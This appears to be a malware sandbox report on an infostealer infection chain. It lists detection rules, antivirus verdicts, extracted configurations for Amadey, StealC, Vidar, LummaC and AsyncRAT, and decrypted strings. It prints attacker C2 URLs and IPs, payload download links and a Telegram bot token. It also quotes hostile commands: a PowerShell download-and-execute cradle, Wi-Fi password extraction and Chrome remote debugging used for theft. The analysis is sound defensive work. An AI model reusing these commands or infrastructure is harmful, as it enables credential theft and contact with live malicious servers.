29.0.t0IHakP.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
29.0.t0IHakP.exe.d00000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
36.2.InstallUtil.exe.140000000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.2.axplong.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.52ba7a538c.exe.1e58000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.52ba7a538c.exe.1e58000.2.unpack	infostealer_win_vidar_strings_nov23	Finds Vidar samples based on the specific strings	Sekoia.io	0x1f88c:$str01: MachineID: 0x1e251:$str02: Work Dir: In memory 0x1f8c3:$str03: [Hardware] 0x1f875:$str04: VideoCard: 0x1eee5:$str05: [Processes] 0x1eef1:$str06: [Software] 0x1e3bb:$str07: information.txt 0x1f598:$str08: %s\* 0x1f5e5:$str08: %s\* 0x1e7a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration 0x1ed61:$str12: UseMasterPassword 0x1f8cf:$str13: Soft: WinSCP 0x1f36e:$str14: <Pass encoding="base64"> 0x1f8b2:$str15: Soft: FileZilla 0x1e3ad:$str16: passwords.txt 0x1ed8c:$str17: build_id 0x1ee80:$str18: file_data
21.2.5fe60d6c80.exe.f70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.skotes.exe.e40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
53.2.axplong.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.axplong.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.skotes.exe.e40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.FIJECAEHJJ.exe.7b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.e40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.4XVI62Q28CHMU2Y2V4F8.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	infostealer_win_stealc_str_oct24	Finds Stealc standalone samples (or dumps) based on the strings	Sekoia.io	0x347d8:$str01: -nop -c "iex(New-Object Net.WebClient).DownloadString( 0x34930:$str02: Azure\.IdentityService 0x34954:$str03: steam_tokens.txt 0x345e8:$str04: "encrypted_key":" 0x34710:$str05: prefs.js 0x34788:$str06: browser: FileZilla 0x3479c:$str07: profile: null 0x347ac:$str08: url: 0x347b4:$str09: login: 0x347bc:$str10: password:
Click to see the 45 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1008943001\28c520debd.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 4212, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\28c520debd.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe, ParentProcessId: 6448, ParentProcessName: Y71AV1VIPLT8Y663WBDXSB.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 3580, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe, ProcessId: 3944, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, ProcessId: 8100, TargetFilename: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, ParentProcessId: 8100, ParentProcessName: t0IHakP.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5364, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: i8Vwc7iOaG.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/nss3.dllis	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/outlookzaliv/random.exe	Avira URL Cloud: Label: phishing
Source: http://31.41.244.11/files/6046979003/k0ukcEH.exe	Avira URL Cloud: Label: phishing
Source: https://mindhandru.buzz/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php57b32d1dd2300446feeffeb11b9axtension	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz:443/api	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/winston/random.exe?	Avira URL Cloud: Label: phishing
Source: http://31.41.244.11/files/5195048147/hmUaBuJ.exe	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000017.00000003.3280907715.0000000005230000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: 29.0.t0IHakP.exe.d00000.0.unpack	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
Source: 34.2.UfEglUg.exe.400000.1.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "undesirabkel.click", "rebuildeso.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--ijcujmprgili"}
Source: t0IHakP.exe.8100.29.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\legs[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k0ukcEH[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\projectspecificpro[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\goldddd123[1].exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ukX1YE2[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1023283001\4f6ebb22d5.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1023284001\5f7e5e6f99.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\1023286001\5f4a2ffa3a.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1023287001\98f8ef74ec.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaiintain.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: i8Vwc7iOaG.exe	ReversingLabs: Detection: 57%
Source: i8Vwc7iOaG.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: i8Vwc7iOaG.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 07
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 01
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 20
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: 25
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetProcAddress
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: LoadLibraryA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: lstrcatA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: OpenEventA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateEventA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CloseHandle
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Sleep
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: VirtualFree
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetSystemInfo
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: VirtualAlloc
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HeapAlloc
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetComputerNameA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: lstrcpyA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetProcessHeap
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetCurrentProcess
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: lstrlenA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ExitProcess
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetSystemTime
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: advapi32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: gdi32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: user32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: crypt32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetUserNameA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateDCA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetDeviceCaps
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ReleaseDC
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: sscanf
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: VMwareVMware
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HAL9TH
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: JohnDoe
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DISPLAY
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: http://185.215.113.206
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: stok
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetFileAttributesA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: HeapFree
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetFileSize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GlobalSize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: IsWow64Process
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Process32Next
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetLocalTime
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: FreeLibrary
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetVolumeInformationA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: Process32First
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetLocaleInfoA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetModuleFileNameA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DeleteFileA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: FindNextFileA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: LocalFree
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: FindClose
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: LocalAlloc
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetFileSizeEx
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ReadFile
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SetFilePointer
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: WriteFile
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateFileA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: FindFirstFileA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CopyFileA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: VirtualProtect
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetLastError
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: lstrcpynA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: MultiByteToWideChar
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GlobalFree
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: WideCharToMultiByte
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GlobalAlloc
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: OpenProcess
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: TerminateProcess
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetCurrentProcessId
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: gdiplus.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: ole32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: bcrypt.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: wininet.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: shlwapi.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: shell32.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: rstrtmgr.dll
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: SelectObject
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BitBlt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: DeleteObject
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateCompatibleDC
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdiplusStartup
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdiplusShutdown
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipDisposeImage
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GdipFree
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CoUninitialize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CoInitialize
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CoCreateInstance
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptDecrypt
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptSetProperty
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptDestroyKey
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetWindowRect
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetDesktopWindow
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetDC
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CloseWindow
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: wsprintfA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CharToOemW
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: wsprintfW
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RegQueryValueExA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RegEnumKeyExA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RegOpenKeyExA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RegCloseKey
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: RegEnumValueA
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack	String decryptor: CryptBinaryToStringA
